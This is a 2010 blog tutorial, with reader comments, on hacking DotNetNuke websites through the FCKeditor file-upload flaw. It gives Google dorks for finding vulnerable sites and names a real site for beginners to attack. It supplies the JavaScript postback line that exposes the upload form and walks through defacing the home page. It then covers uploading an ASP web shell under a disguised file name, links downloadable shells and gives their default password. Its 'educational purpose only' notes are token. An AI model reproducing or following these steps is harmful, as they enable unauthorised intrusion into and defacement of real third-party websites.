Thursday, November 4, 2010

[TUT]Hack Website Using DNN + shell uploading



[TUT]Hack Website Using DNN [Dot Net Nuke] Exploit WITH SHELL UPLOADING
Part 1
Note:- Only for educational purpose
Using google DORK try to find the vulnerable website.



inurl:"/portals/0"

OR

inurl:tabid/176/Default.aspx

OR

inurl:"Fck/fcklinkgallery.aspx" (for all the sites)

OR

inurl:"Fck/fcklinkgallery.aspx" site:{domain of site} (for specified attack)

You can also modify this google dork according to your need & requirement

I have found these 2 website vulnerable to this attack:

http://www.hancocksigns.com/

N00bs can also try both of these websites for testing purpose.

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of 
http://www.hancocksigns.com/
.the image is located at location-
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is
hea2d.gif
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Step 1
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
Step 2
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')


After running this JAVA script, you will see like this


Know remember if theimage is directly in following format
Portals/0/xyz.jpg
Then just click on choose file and upload it….
But if it is other format like ours…our image is in following format
Portals/0/images/hea2d.gif
That mean the image is stored in image folders so just click on file location first and select images
And then put the script and then upload
Now remember if you want to change the image first name the image you want to upload with the uploaded image
For eg if I want to upload the image I will name it to hea2d.gif
And then upload it
Note:- we are doing this only for educational purpose…we don’t want to attack on any ones income source..so pls take the backup of the image you will be changing…so that after learning you can upload the original image back….thnks

Part  II
Uploading the shell
In this part you will learn how to upload the shell so dat u can deface the site
Note:- only for educational purpose
All step are same till step 2..
Just download this shell n upload it
after uploading the shell. To open the shell open in this format
http://www.site.com/portals/0/jaguar.asp;me.jpg
you will see like this
For video TUT visit
http://www.youtube.com/watch?v=e9TZ-gXWLzI
Now comes the shell uploading part

All parts are the same...Just where you upload image upload the asp shell in shell.asp;me.jpg format

Shell link

http://www.mediafire.com/?0t1jmjmgnw2

So when the shell is uploaded your shell link will be something like this


www.site.com/portals/o/shell.asp.me.jpg
Another fun part download the apsxsyp shel from here

http://www.mediafire.com/?isjvjngsl9udu10
Upload this shell using the shell we uploaded first.. Now this shell link will be


www.site.com/portal/o/shell.aspx
Default password for shell is admin



10 comments:

  1. thnxxxx a lot av ..... dnn se shell upload kar sakte hai muje to malum hi nahi tha .. thnxxxx yaar ...

    ReplyDelete
  2. I found a site with a vulnerability where i can upload only .pdf and .doc files. I need a shell matching this need. Renaming the above shell to .pdf or .doc and uploading does not work. Where can i get a shell with .doc or .pdf extension?...please help

    ReplyDelete
  3. it all fake not work we can not load php filessssssssss

    ReplyDelete
  4. "it all fake not work we can not load php filessssssssss"
    You can u jus have to use ur brain to upload jus upload ur shell in image format n upload ur php files

    ReplyDelete
  5. AV plz tell me why "javascript:__doPostBack('ctlURL$cmdUpload','') " doesnt work for me? i put it in url but it doesnt give me browse option. why is it so??

    ReplyDelete
  6. @^^ Which browser are you using?

    ReplyDelete
  7. @^^ then the site may be patched

    ReplyDelete
  8. after uploading shell in jpg format when i tried to open it.. its some thng lok lyk a imag but shell doesnt runs why this was so?? ans plzz

    ReplyDelete
  9. shell link don't work Please Re Upload
    Thanks

    ReplyDelete